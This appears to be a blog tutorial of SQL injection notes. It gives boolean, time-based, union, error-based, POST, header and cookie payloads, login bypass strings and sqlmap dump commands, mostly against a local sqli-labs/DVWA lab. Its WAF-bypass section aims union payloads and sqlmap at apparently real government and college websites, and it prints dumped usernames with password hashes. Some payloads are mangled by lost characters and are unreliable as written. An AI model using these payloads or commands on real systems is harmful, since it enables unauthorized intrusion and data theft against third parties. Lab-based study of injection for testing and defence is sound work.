Blind SQLi
Blind SQL (Structured Query Language) injection is a type of SQL Injection attack that asks the database true or false questions and determines the answer based on the applications response. This attack is often used when the web application is configured to show generic error messages, but has not mitigated the code that is vulnerable to SQL injection.
When an attacker exploits SQL injection, sometimes the web application displays error messages from the database complaining that the SQL Query’s syntax is incorrect. Blind SQL injection is nearly identical to normal SQL Injection, the only difference being the way the data is retrieved from the database. When the database does not output data to the web page, an attacker is forced to steal data by asking the database a series of true or false questions. This makes exploiting the SQL Injection vulnerability more difficult, but not impossible.

http://www.mysqltutorial.org/mysql-substring.aspx
*NOTE: Functions to call in blind sql injection the URL provided to call your self-study.
https://null-byte.wonderhowto.com/forum/explotation-blind-boolean-based-sql-injection-by-mohamed-ahmed-0179938/
*NOTE: Null-byte sql injection to self-study.

Practical side:
Blind SQLI
Blind Boolien based sql Injection.

and 1=1 {true}
and 1=2 {false}
and “a”=”b”

and database()=”xyz”

we cannot assume the database so, in that case we will try some MySQL functions to extract data from the database.
and substring(database(),1,1)=”a”

http://192.168.1.103/sqli-labs-master/Less-8/?id=1′ and substring(database(),1,1)=”s” —
{true well that means first character of first database is s}

http://192.168.1.103/sqli-labs-master/Less-8/?id=1′ and substring(database(),2,1)=”e” —
{true second character of first database is e}

Blind Time-based SQL Injection.
Time-Based SQL Injection
Time-based SQL injection involves sending requests to the database and analyzing server response times in order to deduce information. We can do this by taking advantage of sleep and time delay functions that are utilized in database systems. Like before, we can use the ASCII() and SUBSTRING() functions to aid in enumerating a field along with a new function called SLEEP().
https://null-byte.wonderhowto.com/how-to/sql-injection-101-advanced-techniques-for-maximum-exploitation-0184658/

Learn SQLi Query Fixing

  1. identify sqli vulnerability


    \
  2. balance the query

http://192.168.1.103/sqli-labs-master/Less-1/?id=1 {front end}
select id =’id’ where name =’xyz’ {background}

how to fix

http://192.168.1.103/sqli-labs-master/Less-1/?id=1′ —

select id =’1′ — ‘ where name =’xyz’ {background}

Less-2

in background

select id=1 — where name =xyz

how to fix query

http://192.168.1.103/sqli-labs-master/Less-2/?id=1 —

Less-3

in background
select id = (‘1\’) where name =(‘xyz’)

SQLI Through Get Based

Less-1

http://192.168.1.103/sqli-labs-master/Less-1/?id=1′ — {balanced query }

  1. find total no of vulnerable columns

order by 1{same page }

order by 2 {same page }

order by n {different page }

there is n-1 columns are prsenet

http://192.168.1.103/sqli-labs-master/Less-1/?id=1′ order by 1 —

  1. find exact no of vulnerable columns out of these n-1

union all select 1,2,…n-1

example

union all select 1,2,3

select id=-1′ union all select 1,2,3 — where name =xyz

executed – http://192.168.1.103/sqli-labs-master/Less-1/?id=-1′ union all select 1,2,3 —

  1. execute any datbase sqli query there

on that reflect no

example – database()

version()

user()

executed – http://192.168.1.103/sqli-labs-master/Less-1/?id=-1′ union all select 1,database(),3 —

http://192.168.1.103/sqli-labs-master/Less-1/?id=-1′ union all select 1,database(),user() —

situation you are getting error but you are not getting output of union sqli statement in that case there may error based sqli or may be double query based sql injection.

http://192.168.1.103/sqli-labs-master/Less-5/?id=-1′ —

error/double based sqli query -> hackbar->error/double->get database

Blind SQLI

blind boolien based sqli

and 1=1 {true }

and 1=2 {false }

and “a”=”b”

and database()=”xyz”

we can not assume the database

and substring(database(),1,1)=”a”

http://192.168.1.103/sqli-labs-master/Less-8/?id=1′ and substring(database(),1,1)=”s” — {true vale that means first character of first database is s}

http://192.168.1.103/sqli-labs-master/Less-8/?id=1′ and substring(database(),2,1)=”e” — {true second character of first database is e}

blind time based sqli

‘ and sleep(10) —
” and sleep(10) —

‘) and sleep(10) —

how to extract database for blind time based sqli

‘ and sleep(10) and 1=1 —

i gave http://192.168.1.103/sqli-labs-master/Less-9/?id=1′ and sleep(10) and database()=”security” — its sleeping that’s means

http://192.168.1.103/sqli-labs-master/Less-9/?id=1′ and sleep(10) and database()=”xyz” — {its not sleeping for 10 sec }

Exploitation of GET Based sqli

  1. Database List –

hackbar->union->database->group_concat

information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195

2.find tables of a database -dvwa

hackbar->union->tables->group_concat

guestbook
users

  1. find columns of a table – guestbook

comment_id
comment
name

  1. data of that columns

name,comment

hackbar->union->data->group_concat

name,”<——>”,comment,”—->”,third

Error Based Double Query Exploitaion

what about other database

for if want to fetch remaining database

you have to increase first value of first limit

LIMIT 1,1 – challenges

LIMIT 2,1 – dvwa

LIMIT 3,1 – metasploit

tables

default tables
LIMIT 0,1 – guestbook

LIMIT 1,1 – users

LIMIT 2,1 — you are not getting anything that means there is only two tables

columns for double query based

LIMIT 0,1 – user_id

LIMIT 1,1. — first name

LIMIT 2,1)). — last_name

LIMIT 3,1)). —- user

LIMIT 4,1)). — password

LIMIT 5,1)). — avatar

LIMIT 0,1)). —- nothing

Data of these columns
user password
admin 5f4dcc3b5aa765d61d8327deb882cf99
Gordon e99a18c428cb38d5f260853678922e03
1337 8d3533d75ae2c3966d7e0d4fcc69216b
Pablo

Post Based SQLI

Balance the query

‘ —

problem is not working with post based

instead of use space ( )

or you can also use # to fix

is also used for comment out part of sqli query

— or #

find total no of vulnerable columns

order by 1

find exact no of vulnerable columns

‘ union all select 1,2 #

execute database query

‘ union all select database(),user() #

Less -12

“) union all select 1,2 #

“) union all select database(),user() #

Less-13

‘) #
‘) order by 3#

‘) order by 2 # {order by 2 worked }

‘) union all select 1,2#

situation you are getting error but you are not getting output of union sqli statement in that case there may error based sqli or may be double query based sqli

” AND(SELECT 1 from(SELECT COUNT(),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(schema_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.SCHEMATA WHERE table_schema!=DATABASE() LIMIT 1,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1), FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1 #

Blind boolien post based sqli

Less-15

‘ OR 1=1 #

” OR 1=1 #

‘) OR 1=1 #

“) OR 1=1 #

‘ OR database()=”security” #

‘ OR substring(database(),1,1)=”a” #

‘ OR substring(database(),1,1)=”s” #
first character of database is s

‘ OR substring(database(),2,1)=”e” #

second character of database is e

Less-16

Blind time based
‘ OR sleep(10) #
” OR sleep(10) #
‘) OR sleep(10) #
“) OR sleep(10) # {worked}

“) OR sleep(10) and 1=1 #

“) OR sleep(10) and substring(database(),3,1)=”a” #

application is sleeping when we fired this

“) OR sleep(10) and substring(database(),3,1)=”c” #

that means third character of database is c

Less-17

understand the business logic here

password reset require existing user

default username for this lab is admin

Exploitation of POST Based SQLI

Less-11

inject database query

  1. database list

hackbar -> union -> database-> group_concat

‘ union all select (SELECT GROUP_CONCAT(schema_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.SCHEMATA),2 #

information_schema
challenges
dvwa
MetasploitMySQLowasp10
security
tikiwiki
tikiwiki195

  1. find table of a database – security

‘ union all select (SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479),2 #

emails
referrersuser-agents
users

  1. find columns of a table – users

hackbar->union->columns->group_concat

‘ union all select (SELECT GROUP_CONCAT(column_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x7573657273),2 #

user_id
first_name
last_name
user
password
avatar
id
username
password

  1. data of these columns – user, password

user,”<—–>“, password
‘ union all select 1,(SELECT GROUP_CONCAT(username,”<—–>”,password SEPARATOR 0x3c62723e) FROM security.users) #

Error Based Double Query Exploitation Post Method

‘) AND(SELECT 1 from(SELECT COUNT(),CONCAT((SELECT (SELECT (SELECT DISTINCT CONCAT(0x7e,0x27,CAST(schema_name AS CHAR),0x27,0x7e) FROM INFORMATION_SCHEMA.SCHEMATA WHERE table_schema!=DATABASE() LIMIT 3,1)) FROM INFORMATION_SCHEMA.TABLES LIMIT 0,1), FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a) AND 1=1 #

Header Based sqli

if any application will have to store your headers info into their database there may be headers based sqli

if you will be logged in an application

Cookie Based SQLI

target – testphp.vulnweb.com

Balance Query

‘ —

‘ and ‘x’=’x

select login=’test/test’ and ‘x’=’x ‘ where something other part of query

Header Based sqli

Balance Query

‘ —

‘ and ‘a’=’a

select referrer=’value ‘ OR SLEEP(5) and ‘a’=’a ‘ something other part of query

WAF-Web application firewall by passing.

earlier i tried

‘ order by 1 –+

when I tried

‘ union all select 1,2,3,4,5,6,7 –+

i got not acceptable error

either union may be illegal keyword

may be all will be illegal input

select

illegal word (word)= /!12345word/

‘ /!12345union/ all select 1,2,3 –+

http://multan.gov.pk/page.php?data=-2′ /!12345union/ all select 1,2,database(),4,5,6,7 –+

now exploit this
all database list

hackbar->union->database->group_concat
on any reflect no

(SELECT+GROUP_CONCAT(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA)

‘ /!12345union/ all select 1,2,(SELECT+/!12345GROUP_CONCAT/(schema_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.SCHEMATA),4,5,6,7 –+

Authentication Bypassing through SQLI

let’s assume background of login page

select username =’value1’&password=’value2′ where some other part of query

value1 = ‘ OR 1=1 —

select username =” OR 1=1 — ‘&password=’value2’ where some other part of query

value1= 1′ OR ‘1’=’1

select username =’1′ OR ‘1’=’1 ‘&password=’value2’ where some other part of query

Less-11

SQLMAP GET Based

python sqlmap.py -u “http://192.168.0.103/sqli-labs-master/Less-1/?id=1*” –batch –banner

  1. database list

–dbs

example

python sqlmap.py -u “http://192.168.0.103/sqli-labs-master/Less-1/?id=1*” –batch –banner –dbs

  1. find tables of a database – dvwa

-D DBNAME –tables

example
python sqlmap.py -u “http://192.168.0.103/sqli-labs-master/Less-1/?id=1*” –batch –banner -D dvwa –tables

  1. columns of any table – users

-D DBNAME -T TBNAME –columns

example:
python sqlmap.py -u “http://192.168.0.103/sqli-labs-master/Less-1/?id=1*” –batch –banner -D dvwa -T users –columns

  1. data of these columns – user, first_name, password

-D DBNAME -T TBNAME -C col1,col2,col3 –dump

example :

python sqlmap.py -u “http://192.168.0.103/sqli-labs-master/Less-1/?id=1*” –batch –banner -D dvwa -T users -C user,first_name,password –dump

POST | Header | and Cookie based SQLI through SQLmap

commands

python sqlmap.py -r requestfile –batch –banner

python sqlmap.py -r less11.txt –batch –banner

WAF Bypass with sqlmap

sqlmap.py -u “URL” –batch –banner –tamper=modsecurityversioned

python sqlmap.py -u “http://multan.gov.pk/page.php?data=50*” –batch –banner –tamper=modsecurityversioned

python sqlmap.py -u “http://citicollege.edu.pk/main.php?Id=1*” –batch –banner

RELATED ARTICLESMORE FROM AUTHOR

LEAVE A REPLY

Please enter your comment!
Please enter your name here